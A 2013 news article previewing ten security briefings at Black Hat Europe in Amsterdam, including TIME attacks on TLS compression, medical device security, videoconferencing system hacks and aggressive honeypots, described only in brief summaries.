Black Hat Europe: 10 intriguing security briefings

TIME attacks, medical device security, aggressive honeypots and car traffic hacking talks on tap at this week's Black Hat event

Black Hat Europe 2013

What could possibly go wrong having a bunch of hackers hunkering down in Amsterdam this week at Black Hat Europe 2013? We're afraid to speculate, but what should go right is that they're ready to present a lineup of briefings at this annual security event that look topical and compelling.

Presenters will discuss exploits and vulnerabilities in technologies such as Android and Windows 8, and offer attendees advice on how to protect these and other platforms. Here are 12 briefings that jumped out to us:

*Beyond CRIME attacks: TIME attacks: A pair of Imperva tech researchers will introduce Timing Info-leak Made Easy (TIME) attacks, which simplifies the CRIME attacks revealed last year that could be used to abuse SSL/TLS data compression to hijack HTTP sessions. Unlike with CRIME attacks, which exploit HTTP requests, TIME attacks go after HTTP responses. Don't worry, these guys also plan to discuss mitigation steps against TIME attacks.

[ QUIZ: Black Hat's most notorious incidents ]

*Safeguarding medical devices: InGuardians' Jay Radcliffe will tackle the sticky and scary topic of medical device security. He says that the topic is draped in confusion and aims to clarify the situation by divvying up such devices into three types and discussing the FUD and reality around each from a security standpoint. Radcliffe will also address what regulatory bodies and manufacturers should do to help make medical devices more secure.

*Cloud storage services vs. your firewall - no contest: CRSgroup's Jake Williams will shed new light on how storage synchronization services such as Dropbox, often installed in rogue fashion on enterprise networks, create a data loss protection challenge as well as a way for malware to seep into organizations.

*How secure are mobile device protectors?: Researchers from Vulnex share findings on how easy or difficult it is for smartphone/tablet/laptop thieves to defeat security programs such as GPS trackers and remote data wipers.

*One more highway traffic nightmare to consider: Tools such as Google Navigation and Waze can help drivers on the fly figure out how to avoid gridlock, but what if hackers got ahead of these systems and decided to have everyone head in the same direction. Hamburg University of Technology Ph.D. student Tobias Jeske will explain.

*Even appliances aren't safe: Appliances sound so secure: Your hardware and software prepackaged and ready to deliver firewall, email or other services to your network. But NCC Group's Ben Williams, a penetration tester, says he has "discovered and provided over 100 proof-of-concept exploits to various vendors over the past 12 months, and most of these have related to security appliances."

*Smile, you're on candid videoconferencing systems: Security consultant Moritz Jodeit has examined how to crack Polycom HDX high-end videoconferencing systems via vulnerabilities in the H.323 stack - and how to possibly use them as surveillance rootkits.

*A really sweet honeypot: A Nokia researcher will describe the concept of an aggressive honeypot, one that doesn't just lure and trap intruders, but goes on the offense by de-anonymizing them and taking control of them.

*Playing with app sandbox security: Sandboxing is a method of securing endpoints by keeping their apps confined, but Bromium researchers in this briefing will explain how a lack of sandboxing standards might make these supposed security systems not so safe after all.

*What's up dock?: NCC Group's Andy Davis says that with the flexibility of hot-desking comes the vulnerability of laptop docks as an attack target. He'll point out ways to detect compromised devices and mitigate risks they pose.

Bob Brown tracks network research in his Alpha Doggs blog and Facebook page, as well on Twitter and Google +.

Insider Shootout: Best security tools for small business
Join the discussion
Be the first to comment on this article. Our Commenting Policies